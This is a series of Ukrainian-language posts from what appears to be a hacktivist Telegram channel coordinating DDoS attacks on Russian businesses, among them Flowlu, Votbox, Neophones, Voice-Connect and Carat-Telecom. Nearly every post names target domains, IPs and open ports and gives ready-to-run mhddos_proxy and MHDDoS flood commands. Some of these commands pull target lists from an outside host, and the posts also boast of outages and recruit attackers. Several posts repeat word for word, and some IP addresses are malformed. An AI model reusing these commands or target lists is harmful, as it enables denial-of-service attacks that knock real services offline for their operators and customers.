Доброго дня, Гайдамаки!
Ми вирішили, що ці 4 канали не потрібні, тому через кілька днів їх буде видалено..😓
Причина проста: всі цілі і пости просто дублюються сюди, виникає питання — чому б вам не брати таргети на пряму з основного каналу? Ось і ми так подумали, тому всім активним учасникам прошу перейти на основний канал, лінк нижче:
/channel/haydamaki
Люблю, цілую — головний адмін❤️
Доброго дня Гайдамаки!
Щодо наших перемог на кібер-фронті. Як і хлопці у ЗСУ, ми не даємо ворожим сис.адмінам навіть спокійно піти подивитись "Zомбо-ящик". Бідолаги змушені вдаватися до крайнощів.
Трішки про досягнення:
Сервіс Фертен два дні поспіль відчував себе, як я після весілля кума брата моєї сестри. Звісно вони намагалися вчинити певні дії по реабілітації, але, дивлячись на результат, можемо зробити висновок, що "Бетаргін" їм не допоміг. Тому поколошматили ми їх досить сильно.
Тим часом, ІТ армія орків сидить на березах, ловлячи останні Мб інтернету, ми знову оголошуємо кіновечір.
Так як Доктор Стрендж вже зайняв своє місце у складі Хмельницького ТРО, його на кіно-вечорі сьогодні не буде.
Тому пропонуємо вам запастися смаколиками та провести вечір за переглядом фільму "Сноуден"
Як і зазвичай, перегляд буде відбуватись у перерві між вибором цілей
ЗБІР СЬОГОДНІ 20:30
Без коментарів.... Перша біржа вже лежить, тримаємо в такому прекрасному стані її далі, потім атака на іншу😉👌
Читать полностью…Доброго дня, Гайдамаки!
Ми продовжуємо атакувати Северсталь та їх ресурси. Оголошую другу хвилю атаки!😈
84.38.185.177
[21/TCP, 22/TCP, 80/TCP, 9201/TCP]
217.175.24.21
217.175.24.112
217.175.24.189
217.175.24.192
217.175.24.94
[443/ssl-TCP]
217.175.23.3
217.175.23.4
217.175.18.117
13.80.145.65
217.175.25.190
[53/UDP] —> DNS-servers etc
Команда для Docker:docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
Команда для mhddos_proxy:python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
Команди для MHDDoS:python3 start.py UDP 217.175.23.3:53 5000 10000 true
Гайдамаки. До бою!⚔️
python3 start.py UDP 217.175.23.4:53 5000 10000 true
python3 start.py UDP 217.175.18.117:53 5000 10000 true
python3 start.py UDP 13.80.145.65:53 5000 10000 true
python3 start.py UDP 217.175.25.190:53 5000 10000 true
Доброї ночі, гайдамаки!😴
Атака на флоулу була не дуже вдалою, так як там працють люди, які реально розбираються у своїй справі. Порти постійно фільтрували, але "елегантно" — вони відкриті, зі статусом tcpwrapped😓
На ніч, я вирішив дати не великий сервіс, так як вночі зазвичай активу мало — Вотбокс. Це телефонія, яка дає декільком компаніям свої віртуальні апі і звязок через систему CRM.
api.votbox.ru
www.votbox.ru
votbox.ru
www.virtualofficetools.ru
virtualofficetools.ru
telefononline.ru
84.52.103.122
[80/TCP, 443/TCP]
[25/STMPd, 110/POP3d, 143/IMAPd, 993/ssl-IMAPd, 995ssl-POP3d] —> поштові канали звязку*
mx.virtualofficetools.ru
mx.votbox.ru
84.52.103.120
[443/TCP]
31.177.80.41
89.111.166.6
[53/UDP] —> DNS-servers
Команда для Docker:docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --tabledocker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest http://www.votbox.ru http://www.votbox.ru/cloff.html http://www.votbox.ru/cloffback.html http://telefononline.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table
Команда для mhddos_proxy:python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py http://www.votbox.ru http://www.votbox.ru/cloff.html http://www.votbox.ru/cloffback.html http://telefononline.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table
Команди для MHDDoS:python3 start.py UDP 31.177.80.41:53 5000 10000 true
Всі ми стомились останнім часом.. Війна все "попаскудила" всім, але не час здаватись, потрібно показати оркам, що вони зробили велику помилку👊
python3 start.py UDP 89.111.166.6:53 5000 10000 true
python3 start.py STRESS http://www.votbox.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://www.votbox.ru/cloff.html 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://www.votbox.ru/cloffback.html 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://telefononline.ru 6 1000 proxy.txt 10000 5000 true
Доброго дня, Гайдамаки!❤️
Як бачимо, сервери Фловлу не витримують навантаження, тому продовжуємо атаку. Кожних пів годинки я буду моніторити порти і айпі, якщо буде зміна якась - одразу ж дам знати, щоб ми атакували ефективно.
Також хочеться сказати, що паралельно йде атака на сервіси 1С, що нагнітає обстановку ще більше😉
Зараз прошу реально підключати всі можливі ресурси, оскільки ціль у пріорітеті!
Доброго ранку, Гайдамаки!⚔️
Сьогодні атакуємо вже сервіси Фловлу. Це сервіс-органайзер для бізнес планування. Він складається з різних "боксів", які виконують певні функції — синхронізація заміток, канали пошти, синзронізація з різними онлайн-гаманцями, планування подій, архіви для файлів і ще багато різних ніштяків😏
Важливі порти для атаки — поштові. Як я вже казав в попередньому пості: "Також, хочу сказати, що ми доволі потужно атакували їх поштові канали звязку через порти 25, 110, 145, 993, 995, тобто через в основному протоколи STMP і POP3. Такі атаки є важкими для відновлення ворогу, тому завтра спробуємо повторити досвід"
flowlu.ru
www.flowlu.ru
178.170.244.102
[21/TCP, 22/TCP, 80/TCP]
[25/TCP, 110/TCP, 143/TCP, 465/TCP, 587/TCP, 993/TCP, 995/TCP] —> Dovecot mail-ports (поштові канали звязку)*
mx.flowlu.ru
95.213.248.77 —> висить їх БД
[22/TCP, 3306/TCP, 9100/TCP, 9998/TCP]
legal.flowlu.ru
complitech.flowlu.ru
artgorka.flowlu.ru
acorn.flowlu.ru
labx.flowlu.ru
hc.flowlu.ru
flamingo.flowlu.ru
ironplastgroup.flowlu.ru
relgroup.flowlu.ru
ginoice.flowlu.ru
ronavi.flowlu.ru
pipe.flowlu.ru
my.flowlu.ru
trustyhost.flowlu.ru
37.200.70.155
[22/TCP, 25/TCP]
DNS-servers:
ns1 —> 31.177.80.41 [53/UDP]
ns2 —> 89.111.166.6 [53/UDP]
Команда для Docker:docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://flowlu.ru https://my.flowlu.ru/register https://flowlu.ru/services/tasks/ https://flowlu.ru/prices/ https://flowlu.ru/blog/ http://178.170.244.102/phpmyadmin/ -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
Команда для mhddos_proxy:python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py https://flowlu.ru https://my.flowlu.ru/register https://flowlu.ru/services/tasks/ https://flowlu.ru/prices/ https://flowlu.ru/blog/ http://178.170.244.102/phpmyadmin/ -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
Команди для MHDDoS:python3 start.py UDP 31.177.80.41:53 5000 10000 true
Сервіс доволі вразливий, одразу видно, що його не атакували взагалі. Що ж, потрібно виправляти😊
python3 start.py UDP 89.111.166.6:53 5000 10000 true
python3 start.py POST 95.213.248.77:3306 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.213.248.77:9100 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.213.248.77:9998 6 1000 proxy.txt 10000 10000 true
python3 start.py STRESS https://flowlu.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://my.flowlu.ru/register 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/services/tasks/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/prices/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/blog/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://178.170.244.102/phpmyadmin/ 6 1000 proxy.txt 10000 5000 true
Доброго дня, Гайдамаки!😊
Продовжуємо завдавати удару ворогам на кіберфронті. Вчора ми змогли різким ударом повалити сайти Неофонс-телефонії. Молодці!❤️
Наша ціль на зараз — та ж сама, але, оскільки вони почали масово закривати порти на основних айпі, було проведено додаткову розвідку і виявлено кілька поштових айпі з відкритими портами.
Доповнюю основну ціль, результат тримайте нижче.
neophones.ru
neocomms.ru
www.neocomms.ru
www.neophones.ru
83.166.225.198 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)*
wiki.neophones.ru
217.150.199.10 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)
MAIL-servers:
217.150.193.196
[110/TCP, 143/TCP, 993/TCP, 995/TCP]
83.166.225.200
[25/TCP]
DNS-servers:
217.150.192.194
217.150.193.194
[53/UDP(open)]
Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
Прошу атакувати командою вище - атака по вразливих портах***
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table
Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
Прошу атакувати командою вище - атака по вразливих портах***
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table
Команди для MHDDoS:
python3 start.py UDP 217.150.192.194:53 5000 10000 true
python3 start.py UDP 217.150.193.194:53 5000 10000 true
python3 start.py STRESS https://neophones.ru/utm5/connect_master 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neocomms.ru/payment 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neocomms.ru/contacts 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neophones.ru/tariffs 6 1000 proxy.txt 10000 5000 true
Update: 19:42 —> атакуємо поштові айпі, саме зараз вони відкрили знову порти, тому ЗАРАЗ важливо атакувати саме командою TCP**
Доброго вечора, Гайдамаки!
Наша ціль на зараз — та ж сама, але, оскільки вони почали масово закривати порти на основних айпі, було проведено додаткову розвідку і виявлено кілька поштових айпі з відкритими портами.
Доповнюю основну ціль, результат тримайте нижче.
neophones.ru
neocomms.ru
www.neocomms.ru
www.neophones.ru
83.166.225.198 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)*
wiki.neophones.ru
217.150.199.10 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)*
MAIL-servers:
217.150.193.196
[110/TCP(filtered), 143/TCP(filtered), 993/TCP(filtered), 995/TCP(filtered)] —> гади почали фільтрувати порти, по тсп не атакуємо**
83.166.225.200
[25/TCP] —> все ще відкритий, атаку по тсп можна робити*
DNS-servers:
217.150.192.194
217.150.193.194
[53/UDP] —> все ще відкриті, атаку по юдп не припиняємо*
Команда для Docker:docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --tabledocker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table
Команда для mhddos_proxy:python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table
Команди для MHDDoS:python3 start.py UDP 217.150.192.194:53 5000 10000 true
Update: 22:36 —> почали фільтрувати майже всі вразливі порти тсп, тому стараємось зараз сконцентруватись на юдп і атаках по юрл**
python3 start.py UDP 217.150.193.194:53 5000 10000 true
python3 start.py STRESS https://neophones.ru/utm5/connect_master 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neocomms.ru/payment 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neocomms.ru/contacts 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neophones.ru/tariffs 6 1000 proxy.txt 10000 5000 true
Доброго дня, Гайдамаки!😊
Продовжуємо завдавати удару ворогам на кіберфронті. Вчора ми змогли різким ударом повалити сайти Неофонс-телефонії. Молодці!❤️
Наша ціль на зараз — та ж сама, але, оскільки вони почали масово закривати порти на основних айпі, було проведено додаткову розвідку і виявлено кілька поштових айпі з відкритими портами.
Доповнюю основну ціль, результат тримайте нижче.
neophones.ru
neocomms.ru
www.neocomms.ru
www.neophones.ru
83.166.225.198 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)*
wiki.neophones.ru
217.150.199.10 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)*
MAIL-servers:
217.150.193.196
[110/TCP(filtered), 143/TCP(filtered), 993/TCP(filtered), 995/TCP(filtered)] —> гади почали фільтрувати порти, по тсп не атакуємо**
83.166.225.200
[25/TCP] —> все ще відкритий, атаку по тсп можна робити*
DNS-servers:
217.150.192.194
217.150.193.194
[53/UDP] —> все ще відкриті, атаку по юдп не припиняємо*
Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table
Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table
Команди для MHDDoS:
python3 start.py UDP 217.150.192.194:53 5000 10000 true
python3 start.py UDP 217.150.193.194:53 5000 10000 true
python3 start.py STRESS https://neophones.ru/utm5/connect_master 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neocomms.ru/payment 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neocomms.ru/contacts 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neophones.ru/tariffs 6 1000 proxy.txt 10000 5000 true
Update: 22:36 —> почали фільтрувати майже всі вразливі порти тсп, тому стараємось зараз сконцентруватись на юдп і атаках по юрл**
Доброї ночі, гайдамаки!💪
Сьогодні ми продовжили атакувати войс-конект, тримаємо всіма силами, як можемо. Скажу так, в них зараз почалась паніка - через те, що система не справляється з навантаженням, тому мінімум ще один день ми їх помучимо😈👌
Також я написав їм в техпідтримку - мені відповіли, що в них "небольшие проблемы", і що їх команда "спеціалістів", активно працює над цим. Бачу, що не дуже добре працює, так як сервіс вже лежить три дні підряд🧐👍
З технічної точки зору скажу так, БД вони не можуть відновити. Тому що, як тільки відкривають порти і хочуть запустити сервіс, ми одразу ж їх валимо, без шансів. Єдине, що в них працює (з перебоями постійно і з помилками 500), це домашня сторінка. Але вона не важлива, без доступу до сторінки входу і реєстрації в особистий кабінет клієнтів😉
Тому продовжуємо давити окупантів. Війна вже набридла нам, хочеться миру, і в Росії люди повинні це зрозуміти вже...
Доброї ночі, Гайдамаки!
По таргетам: продовжуємо атаку на войс конект, бо їм дуже погано стає вже, ситуація накаляється. Через годину кину оновлений таргет, для додаткової атаки.
Також хочу поширити серед вас форму. Ми спільно з іншими групами вирішили створити команду пентестерів. Нам потрібні люди, які добре знаються в компютерних мережах:
– Знаходишся у IT-сфері, і хочеш допомогти нашій країні своїми навичками.
– Знайомий з вірусами/пентестом на “ти” і маєш вільний час для його використання.
– Працював у IT-компаніях Middle/Senior-розробником будь-якого калібру.
Якщо ви один і з таких, тоді прошу сюди:
https://cyberarmy.com.ua/?page_id=6863
Гайдамаки, доброго ранку! Зараз увага!!!
Войс-конект почали активно працювати над захистом своїх систем. Перший їх крок — це підвязка нової айпі для БД (ближче до 5 ранку), щоб розподілити навантаження на їх систему, також невеличка зміна в портах, що ж, гайдамаки не сплять, тому їм буде не солодко. Добавляю внизу оновлений таргет👌
185.248.100.60
[22/TCP, 25/TCP, 111/TCP, 443/TCP]
[123/UDP open] —> синхронізація часу, не дуже важливо, але додатково зафлудити можна*
77.244.214.121
[22/TCP, 25/TCP, 443/TCP]
95.163.87.128 —> висить їх БД*
[22/TCP, 1720/TCP, 5060/TCP]
[123/UDP open|filtered] —> синхронізація часу, не дуже важливо, але додатково зафлудити можна*
95.163.87.125 —> підвязують сюди свою базу даних, яку ми положили*
[22/TCP, 1720/TCP, 3306/TCP]
[389/UDP, 5000/UDP, 5060/UDP] —> не на довго відкриті юдп порти, швидше за все для налаштування нової БД*
Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table(рекомендую зараз атакувати саме командою вище)*
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://www.voice-connect.ru https://voice-connect.ru https://my.voice-connect.ru http://billing.voice-connect.ru -t 2000 --rpc 1200 -p 800 --http-methods STRESS POST --tableКоманда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table(рекомендую зараз атакувати саме командою вище)*
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py https://www.voice-connect.ru https://voice-connect.ru https://my.voice-connect.ru http://billing.voice-connect.ru -t 2000 --rpc 1200 -p 800 --http-methods STRESS POST --tableКоманди для MHDDoS:
python3 start.py UDP 185.248.100.60:123 5000 10000 true(вище вказав пріорітетні команди для MHDDoS)*
python3 start.py UDP 95.163.87.125:389 5000 10000 true
python3 start.py UDP 95.163.87.125:5000 5000 10000 true
python3 start.py UDP 95.163.87.125:5060 5000 10000 true
python3 start.py POST 95.163.87.125:3306 6 1000 proxy.txt 10000 10000 true
python3 start.py STRESS https://www.voice-connect.ru 6 1000 proxy.txt 10000 5000 trueДавим, давим, і ще раз давим рашистів😤
python3 start.py STRESS https://voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://billing.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://my.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py POST 3185.248.100.60:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 3185.248.100.60:443 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 3185.248.100.60:111 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 3185.248.100.60:25 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 77.244.214.121:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 77.244.214.121:25 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 77.244.214.121:443 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.128:1720 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.128:5060 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.128:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.125:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.125:1720 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.125:3306 6 1000 proxy.txt 10000 10000 true
Доброго вечора, гайдамаки!☺️
Наша нічна ціль на сьогодні – доволі популярна в Росії бізнес-компанія телефонії рашистів, а саме Войс-конект. Ціль складна, але я вірю в наші сили))
Спробуємо повалити, якщо вийде, будемо тримати кілька днів. Тому що останнім часом ми як голодна акула, яка шукає поживи — поки не атакує нікого достатньо довго, щоб загнати жертву в пастку😈
Всім гарно повеселитись!
www.voice-connect.ru
voice-connect.ru
my.voice-connect.ru
billing.voice-connect.ru
185.248.100.60
[22/TCP, 25/TCP, 80/TCP, 111/TCP, 443/TCP]
[123/UDP] —> синхронізація часу, не дуже важливо, але додатково зафлудити можна*
195.88.209.73
[22/TCP, 443/TCP, 8088/TCP]
77.244.214.121
[22/TCP, 25/TCP, 80/TCP, 443/TCP]
95.163.87.128
[22/TCP, 80/TCP, 443/TCP, 1720/TCP, 3306/TCP, 5060/TCP]
[123/UDP] —> синхронізація часу, не дуже важливо, але додатково зафлудити можна*
Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --tableКоманда для mhddos_proxy:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://www.voice-connect.ru https://voice-connect.ru https://my.voice-connect.ru http://billing.voice-connect.ru -t 2000 --rpc 1200 -p 800 --http-methods STRESS POST --table
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --tableКоманди для MHDDoS:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py https://www.voice-connect.ru https://voice-connect.ru https://my.voice-connect.ru http://billing.voice-connect.ru -t 2000 --rpc 1200 -p 800 --http-methods STRESS POST --table
python3 start.py STRESS https://www.voice-connect.ru 6 1000 proxy.txt 10000 5000 trueГайдамаки до бою! Потрібно багато атак одночасно за короткий проміжок часу😊
python3 start.py STRESS https://voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://billing.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://my.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py UDP 95.163.87.128:53 5000 10000 true
python3 start.py UDP 185.248.100.60:53 5000 10000 true
python3 start.py POST 3185.248.100.60:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 3185.248.100.60:443 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 3185.248.100.60:111 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 3185.248.100.60:25 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 77.244.214.121:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 77.244.214.121:25 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.128:1720 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.128:1720 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.163.87.128:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 195.88.209.73:22 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 195.88.209.73:8080 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 195.88.209.73:443 6 1000 proxy.txt 10000 10000 true
Доброї ночі, Гайдамаки!😴
Сьогодні було влаштовано масштабну атаку на сервери сбербанку, але ця атака дала ефект лише на короткий час, саме напочатку, коли ще порти були відкриті. В основному це дало тимчасові незручності і все. Систему банку знищити не так просто, тому переходимо до наступної цілі..
Продовжуємо по традиції наші рейди на бізнес-телефонії рашистів. Третя хвиля атаки Гайдамаків!!! Цього разу я обрав доволі слабкий ресурс(вночі трафік атаки малий доволі), а саме карат-телеком. Цікаво те, що в інсайдтел зараз ребрендинг і вони інтегрували свої ресурси під карат, а це означає, що ми одним пострілом вбємо два зайці.😁
www.carat-telecom.ru
carat-telecom.ru
31.31.196.124
[21/TCP(filtered), 22/TCP(filtered), 25/TCP(filtered), 110/TCP(filtered), 111/TCP(filtered), 143/TCP(filtered), 465/TCP(filtered), 993/TCP(filtered), 995/TCP(filtered), 3306/TCP(filtered)]
[53/UDP(open|filtered)]
ce.insidetel.com
195.211.30.51
[1723/TCP(filtered), 5060/TCP(filtered)]
lk.carat-telecom.ru
78.109.112.43
[1723/TCP(filtered), 2345/TCP(filtered), 5060/TCP(filtered)]
Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://www.carat-telecom.ru https://carat-telecom.ru http://ce.insidetel.com https://lk.carat-telecom.ru -t 2000 --rpc 1200 -p 800 --http-methods STRESS --table(не рекомендую зараз)*
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 3000 --rpc 1000 --table
python runner.py https://www.carat-telecom.ru https://carat-telecom.ru http://ce.insidetel.com https://lk.carat-telecom.ru -t 2000 --rpc 1200 -p 800 --http-methods STRESS --table(не рекомендую зараз)*
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1200 -p 3000 --rpc 1000 --table
python3 start.py STRESS https://www.carat-telecom.ru 6 1000 proxy.txt 10000 5000 true(не рекомендую зараз)*
python3 start.py STRESS https://carat-telecom.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://ce.insidetel.com 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://lk.carat-telecom.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py UDP 31.31.196.124:53 5000 10000 true
Доброї ночі, Гайдамаки, цей пост буде більш розмовного характеру💡
Сьогодні ми продовжили атаку на ЕГАИС, але поки що можу сказати одне — їх сервери були довго вимкнені і взагалі відгороджені від інтернету, так сказати, "закрились на ремонт", тим часом закрились ще два заводи-пивоварні, так як продукція стоїть на складах, а вивезти її не можуть... Поки що я слідкую за ситуацією там і вже вранці точно зможу сказати, що атакуємо далі, думаю, що б такого цікавого підготувати рашистам на 9 травня😏
А зараз відпочивайте)
Також, хочу сказати, що ми готуємо автоматичну програму для запуску кібератак на Windows (це для тих, хто боїться запускати консоль/термінал). Все, що вам буде потрібно зробити, — це запустити ".exe" файл. Все. Атака буде йти. Більш детальнішу інформацію ви отримаєте згодом, але сам факт полягає в тому, що атакувати зможуть навіть люди, які далекі від ІТ і не знають "шо куди жати і шо це за команди якісь на каналі". Навіть ваша бабуся запустить атаку😁
